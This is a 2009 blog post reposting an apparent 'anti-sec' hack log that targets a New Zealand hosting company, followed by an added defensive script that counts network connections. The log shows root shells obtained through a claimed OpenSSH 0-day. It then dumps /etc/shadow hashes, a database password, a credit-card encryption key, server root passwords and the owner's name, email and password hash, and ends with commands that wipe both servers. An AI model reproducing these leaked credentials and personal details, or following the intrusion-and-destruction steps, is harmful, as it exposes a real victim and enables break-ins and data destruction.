Tuesday, July 7, 2009

anti-sec hack log

Someone posted what appears to be a hack log on pastebin, complete with the output of what is claimed to be a 0-day OpenSSH exploit (if in fact this is real: the log shows nothing of the exploit beyond the tool's own banner and a progress bar before the root shell appears, and both targets merely advertise an OpenSSH_4.3 banner, so the log itself does not demonstrate an OpenSSH vulnerability).

Posted by pwnt on Sat 4 Jul 10:09

                       __  .__
        _____    _____/  |_|__|           ______ ____   ____
        \__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\
         / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___
        (____  /___|  /__| |__|         /____  >\___  >\___  >
             \/     \/                       \/     \/     \/

        Some of you have seen a lot of casualties lately in the webhosting scene:
        hosting companies being wiped and rm'd at the expense of their clients. While
        some of this is collateral damage, we're about to show you, ladies and
        gentlemen, that sometimes you aren't pwned because of who you host but what you
        say.

                Practice what you preach.

- Why SSANZ?

Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide. We are against that.


LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:

>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems

Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:


>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery


>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation

Security Worries? Security Audits - 50% OFF  <http://www.webhostingtalk.com/showthread.php?t=859795>:

>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>>    * Scan for Shells/malicious scripts
>>    * Scan for vulnerable web content ( permissions, RFI's )
>>    * Scans for Vulnerable Server Services
>>    * Vulnerable Ports
>>    * Testing of TCP handling - dDOS test.
>>    * Scan for Vulnerable PHP scripts/mods.
>>    * Control Panel Security Audit ( external )
>>    * Multiple Unique SSANZ Custom Scans*
>>
>>
>>Internal Security
>>
>>    * Permissions/Ownership(s) Review
>>    * Apache/Webserver Security
>>    * User Account Security & binaries access audit
>>    * Local RFI Exploits located/patched.
>>    * System Binary Security Audit
>>    * Firewall/IPTABLES Audit
>>    * Bruteforce detection test & audit
>>    * Root Access Authentication Audit
>>    * Local PHP Functions Audit
>>    * Control Panel Security Audit ( Internal )
>>    * Kernel Security Audit
>>    * Additional SSANZ Custom Scans/Audit*

We at anti-sec decided to give you a _FREE_ Full Security Audit!*

* `rm -rf /` is included.


anti-sec:~/pwn# ./map ssanz.net

        IP: 66.197.143.133 ( osiris.ssanz.net )
        WWW: Apache/2.2.11
        SSH: SSH-2.0-OpenSSH_4.3

        IP: 66.197.204.101 ( devil.ssanz.net )
        WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
        SSH: SSH-2.0-OpenSSH_4.3

anti-sec:~/pwn# cd xpl/

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22

                [+] 0wn0wn - anti-sec group
                [+] Target: 66.197.143.133
                [+] SSH Port: 22

                [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::

sh-3.2# w
 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 3008
drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
-rw-------  1 root     root         957 Jun 13 07:24 .accesshash
-rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
-rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
-rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
-rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
-rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
-rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
-rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
-rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
drwx------  2 root     root        4096 Jun  1 13:54 .elinks
-rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
-rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
drwx------  3 root     root        4096 Jun  1 10:39 .gconf
drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
-rw-r--r--  1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
-rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
-rw-r--r--  1 root     root        4246 Jun  1 10:39 install.log.syslog
drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
-rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
-rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
-rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
-rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
-rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
-rw-------  1 root     root        1024 Jun  7 19:50 .rnd
drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
drwx------  2 root     root        4096 Jun  2 06:41 .ssh
-rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
-rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups



sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install

sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009

sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
-rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
-rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
-rw-------   1 billing billing       17 May 27  2008 .contactemail
drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
-rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
-rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
-rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
drwx------   4 billing billing     4096 Jun  7 21:53 ssl
drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
drwx------   2 billing billing     4096 May 27  2008 .trash
lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
-rw-r--r--   1 billing billing      658 May 27  2008 .zshrc

sh-3.2# cd www/

sh-3.2# ls
admin                 banned.php             configuressl.php  domainchecker.php  init.php             logout.php            postinfo.html       templates        viewticket.php  whois.php
affiliates.php        billing                contact.php       downloads          installmingchowping  modules               _private            templates_c      _vti_bin
aff.php               cart.php               creditcard.php    downloads.php      knowledgebase.php    networkissues.php     register.php        tutorials.php    _vti_cnf
announcements.php     cgi-bin                dbconnect.php     htaccess.txt       lang                 networkissuesrss.php  serverstatus.php    upgrade          _vti_inf.html
announcementsrss.php  clientarea.php         display.php       images             libs                 order.php             status              upgrade.php      _vti_log
announcements.xml     configuration.php      dl.php            includes           link.php             passwordreminder.php  submitticket.php    viewemail.php    _vti_pvt
attachments           configuration.php.new  dologin.php       index.php          login.php            pipe                  supporttickets.php  viewinvoice.php  _vti_txt

sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>

sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use billing_billing;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+----------------------------+
| Tables_in_billing_billing  |
+----------------------------+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+----------------------------+
80 rows in set (0.00 sec)

mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name         | ipaddress      | hostname         | username | password                                                                 |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email           | username | password                         |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)

mysql> quit
Bye


sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup

sh-3.2# exit
exit


-----------------------------------

osiris                  [ DOWN ]
devil                   [  UP  ]

-----------------------------------

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

                [+] 0wn0wn - anti-sec group
                [+] Target: 66.197.204.101
                [+] SSH Port: 22

                [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::

sh-3.2# w
 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root   4096 Jul  4 04:06 .
drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
-rw-------  1 root root    957 Jun 13 05:20 .accesshash
-rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
-rw-------  1 root root   7258 Jun 30 10:03 .bash_history
-rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
-rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
-rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
-rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
-rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
drwx------  2 root root   4096 Jun 12 01:51 .elinks
-rw-r--r--  1 root root     16 Jun 13 15:33 .forward
drwx------  3 root root   4096 Jun 11 23:59 .gconf
drwx------  2 root root   4096 Jun 11 23:59 .gconfd
drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
drwx------  2 root root   4096 Jun 12 01:53 .gnupg
drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
-rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
-rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
-rw-------  1 root root     37 Jun 12 02:11 .my.cnf
drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
-rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
-rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
-rw-------  1 root root   1024 Jun 12 02:50 .rnd
drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
drwx------  2 root root   4096 Jun 22 09:11 .ssh
-rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi

sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso

sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# exit
exit


-----------------------------------

osiris                  [ DOWN ]
devil                   [ DOWN ]

-----------------------------------

Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.

Fix that first, you dig?

~ There will always be no way out.


The pastebin: http://pastebin.com/f7067caf.
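The .bash_history dumps in the log show the admin re-typing the same netstat | awk | cut | sort | uniq -c pipeline by hand, interleaved with `csf -d` blocks, while the box was under load. The following is an added example and is not part of the pastebin or of this post: the same per-source connection count as reusable shell functions, plus a threshold filter whose output can be fed to a blocklist. The sample netstat output is constructed from documentation address ranges (not the hosts in the log), and `csf` in the usage note is assumed to be installed.

```shell
#!/bin/sh
# Added example, not from the pasted log: the per-source connection count that
# the admin's .bash_history repeats by hand (netstat | awk | cut | sort | uniq -c),
# as reusable functions, plus a threshold filter for feeding a blocklist.

# count_sources: read `netstat -ntu` / `netstat -anp` style output on stdin and
# print "count remote-address", most connections first. Header lines are skipped
# by matching the protocol column; only the trailing ":port" is removed, so
# IPv4-mapped IPv6 addresses such as ::ffff:198.51.100.9 survive intact
# (the `cut -d: -f1` in the log reduces every IPv6 address to an empty field).
count_sources() {
    awk '$1 ~ /^(tcp|udp)6?$/ {
            addr = $5
            sub(/:[0-9*]+$/, "", addr)            # strip ":port" (or ":*"), keep the rest
            if (addr ~ /^\*/ || addr == "") next    # listening sockets, nothing to count
            n[addr]++
         }
         END { for (a in n) printf "%d %s\n", n[a], a }' | sort -rn
}

# flood_sources LIMIT: only the addresses with more than LIMIT connections
# (default 50), one per line, e.g. for `... | xargs -n1 csf -d` (csf assumed present).
flood_sources() {
    limit=${1:-50}
    count_sources | awk -v lim="$limit" '$1 > lim { print $2 }'
}

# sample_netstat: constructed `netstat -ntu` output (documentation address ranges,
# not the hosts in the log) so the functions can be exercised offline.
sample_netstat() {
    cat <<'EOF'
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State
tcp        0      0 192.0.2.10:80               198.51.100.7:51234          ESTABLISHED
tcp        0      0 192.0.2.10:80               198.51.100.7:51235          SYN_RECV
tcp        0      0 192.0.2.10:80               198.51.100.7:51236          SYN_RECV
tcp        0      0 192.0.2.10:80               198.51.100.7:51237          SYN_RECV
tcp        0      0 192.0.2.10:80               203.0.113.5:40001           ESTABLISHED
tcp        0      0 192.0.2.10:22               203.0.113.5:40002           ESTABLISHED
tcp6       0      0 ::ffff:192.0.2.10:80        ::ffff:198.51.100.9:4000    TIME_WAIT
udp        0      0 192.0.2.10:53               203.0.113.5:5353            ESTABLISHED
EOF
}

# Stand-alone run: the full count, then only the sources over a limit of 3.
sample_netstat | count_sources
sample_netstat | flood_sources 3
```

On a live host replace `sample_netstat` with `netstat -ntu` (or `ss -ntu`, whose columns differ and would need the field index adjusted). Keeping the count and the threshold in two functions means the number that justifies a block is explicit, instead of being eyeballed from a scrolling `sort -n` listing between `csf -d` commands.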